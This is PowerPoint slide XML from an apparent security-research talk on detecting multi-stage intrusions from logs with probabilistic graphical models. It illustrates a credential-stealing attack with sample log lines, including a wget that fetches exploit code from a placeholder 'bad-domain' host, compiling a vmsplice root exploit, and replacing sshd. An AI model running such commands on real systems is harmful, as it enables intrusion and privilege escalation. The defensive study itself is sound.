                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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$ gcc vm.c -o a; ./a</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:endParaRPr sz="2400"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endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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Linux vmsplice Local Root Exploit       </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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[+] mmap: 0xAABBCCDD</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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[+] page: 0xDDEEFFGG</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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# whoami </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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root</a:t>
              </a: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9244035" y="4199157"/>
            <a:ext cx="3705912" cy="2276909"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3705911" cy="2276908"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Shape 88"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="3705912" cy="574675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C3971A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8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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2. OS fingerprinting</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="Shape 89"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="669368"/>
              <a:ext cx="3705912" cy="1607541"/>
            </a:xfrm>
            <a:prstGeom prst="rect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l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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$ uname -a; w</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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Linux 2.6.xx, up  1:17, 1 user</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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USER     TTY   LOGIN@  IDLE</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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xxx   console 18:40       1:16</a:t>
              </a:r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84439" y="12085537"/>
            <a:ext cx="5348090" cy="1107290"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5348089" cy="1107289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Shape 91"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5348090" cy="574675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0B5D18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8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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1. Login remotely</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Shape 92"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="604648"/>
              <a:ext cx="5348090" cy="502642"/>
            </a:xfrm>
            <a:prstGeom prst="rect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2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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sshd: Accepted &lt;user&gt; from &lt;remote&gt;</a:t>
              </a:r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11768227" y="8031375"/>
            <a:ext cx="5348090" cy="1132172"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5348089" cy="1132171"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Shape 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5348090" cy="574675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506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8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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5. Replace SSH daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="Shape 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="629530"/>
              <a:ext cx="5348090" cy="502642"/>
            </a:xfrm>
            <a:prstGeom prst="rect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2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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sshd: Received SIGHUP; restarting. </a:t>
              </a:r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279400" y="3712641"/>
            <a:ext cx="3082610" cy="901602"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3082609" cy="901600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="97" name="pasted-image.png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0" y="0"/>
              <a:ext cx="901601" cy="901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8" name="Shape 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="957344" y="55413"/>
              <a:ext cx="2125266" cy="790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l" defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" i="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>alice</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" b="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>password123</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l" defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" i="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>bob</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" b="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>password456</a:t>
              </a:r>
              <a:endParaRPr sz="16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 defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10602935" y="-2606730"/>
            <a:ext cx="3705913" cy="574676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C3971A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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. OS fingerprinting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Shape 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20407789" y="-6773610"/>
            <a:ext cx="5234621" cy="574676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="861001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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.  Escalate privilege</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16766668" y="-2608119"/>
            <a:ext cx="5470823" cy="574676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BD5B0C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2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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Download exploit (CVE-0806)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="106" name="Group 106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2167239" y="5210650"/>
            <a:ext cx="3705913" cy="2024992"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3705911" cy="2024990"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="103" name="Shape 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1450315"/>
              <a:ext cx="3705912" cy="574676"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506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28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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Password guessing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104" name="Shape 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12416" y="725157"/>
              <a:ext cx="3681079" cy="574676"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BD5B0C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28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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Email fishing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="Shape 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="3681078" cy="574675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C3971A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28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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Social engineering</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="pasted-image.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="44631" t="26210" r="11011" b="35526"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13037976" y="5129755"/>
            <a:ext cx="2534991" cy="21867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asted-image.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="7827" r="14635"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12961805" y="5135495"/>
            <a:ext cx="2470292" cy="21860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1" name="Group 111"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4851400" y="3238599"/>
            <a:ext cx="3082610" cy="901601"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3082609" cy="901600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="109" name="pasted-image.png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0" y="0"/>
              <a:ext cx="901601" cy="901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0" name="Shape 110"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="957344" y="55413"/>
              <a:ext cx="2125266" cy="790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l" defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" i="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>alice</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" b="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>password123</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l" defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" i="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>bob</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" b="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>password456</a:t>
              </a:r>
              <a:endParaRPr sz="1600"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 defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Shape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7583170" y="-6974"/>
            <a:ext cx="9217661" cy="887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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5000"/>
              <a:t>A Credential-Stealing Attack (NCSA)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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23933125" y="13175654"/>
            <a:ext cx="325091" cy="51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fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr sz="2400" b="1"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568595" y="10435282"/>
            <a:ext cx="18211286" cy="2654301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C8250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 defTabSz="509411">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="48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Signature-based detects known attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="509411">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="48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Anomaly-based has a lot of false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="509411">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="48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Human notifications are often late</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Shape 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589845" y="3479651"/>
            <a:ext cx="21458527" cy="4356101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00882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 defTabSz="509411">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="48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Continuous and comprehensive monitoring (raw logs such as syslog, network flows, IDS logs; user profile; expert knowledge)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="509411">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="48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algn="l" defTabSz="509411">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="48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Use probabilistic graphical models to develop an inference framework to detect progressing attacks.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6" animBg="1" advAuto="0"/>
      <p:bldP spid="62" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="63" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="64" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="76" grpId="18" animBg="1" advAuto="0"/>
      <p:bldP spid="78" grpId="10" animBg="1" advAuto="0"/>
      <p:bldP spid="81" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="81" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="84" grpId="13" animBg="1" advAuto="0"/>
      <p:bldP spid="87" grpId="14" animBg="1" advAuto="0"/>
      <p:bldP spid="90" grpId="12" animBg="1" advAuto="0"/>
      <p:bldP spid="93" grpId="11" animBg="1" advAuto="0"/>
      <p:bldP spid="96" grpId="15" animBg="1" advAuto="0"/>
      <p:bldP spid="99" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="106" grpId="8" animBg="1" advAuto="0"/>
      <p:bldP spid="106" grpId="9" animBg="1" advAuto="0"/>
      <p:bldP spid="108" grpId="16" animBg="1" advAuto="0"/>
      <p:bldP spid="111" grpId="17" animBg="1" advAuto="0"/>
      <p:bldP spid="114" grpId="19" animBg="1" advAuto="0"/>
      <p:bldP spid="115" grpId="2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2905725" y="-544"/>
            <a:ext cx="20186016" cy="887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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5000"/>
              <a:t>Integrating Heterogeneous Monitoring Data Using Probabilistic Graphical Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Shape 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9627424" y="11446413"/>
            <a:ext cx="4479331" cy="1354964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sz="2000"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$ wget </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" u="sng"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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>server6.bad-domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"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/vm.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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Connecting to xx.yy.zz.tt:80… connected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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HTTP 1.1 GET /vm.c 200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14647474" y="10149607"/>
            <a:ext cx="3705913" cy="2574164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sz="2000"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$ gcc vm.c -o a; ./a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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Linux vmsplice Local Root Exploit       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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[+] mmap: 0xAABBCCDD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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[+] page: 0xDDEEFFGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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# whoami </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662635" y="11446413"/>
            <a:ext cx="3705913" cy="1354964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sz="2000"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$ uname -a; w</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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Linux 2.6.xx, up  1:17, 1 user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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USER     TTY   LOGIN@  IDLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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xxx   console 18:40       1:16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033569" y="12360813"/>
            <a:ext cx="4217790" cy="440564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000"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sshd: Accepted &lt;user&gt; from &lt;remote&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Shape 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18611155" y="12259137"/>
            <a:ext cx="5348090" cy="440564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000"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sshd: Received SIGHUP; restarting. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Shape 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42969" y="12208413"/>
            <a:ext cx="799704" cy="745364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sz="2000"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RAW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000"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LOGS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="135" name="Group 135"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="42969" y="7913586"/>
            <a:ext cx="23952004" cy="1660310"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23952003" cy="1660308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="124" name="Shape 124"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9611698" y="0"/>
              <a:ext cx="4551844" cy="511176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BD5B0C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DOWNLOAD_SENSITIVE (.C)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="Shape 125"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14662520" y="0"/>
              <a:ext cx="3716883" cy="511176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="861001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COMPILE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="Shape 126"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5683166" y="0"/>
              <a:ext cx="3705912" cy="511175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C3971A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OS_FINGERPRINT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1052256" y="0"/>
              <a:ext cx="4221477" cy="511175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0B5D18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LOGIN_REMOTELY</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="128" name="Shape 128"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="18659458" y="0"/>
              <a:ext cx="5292546" cy="511176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506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RESTART SYS SERVICE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
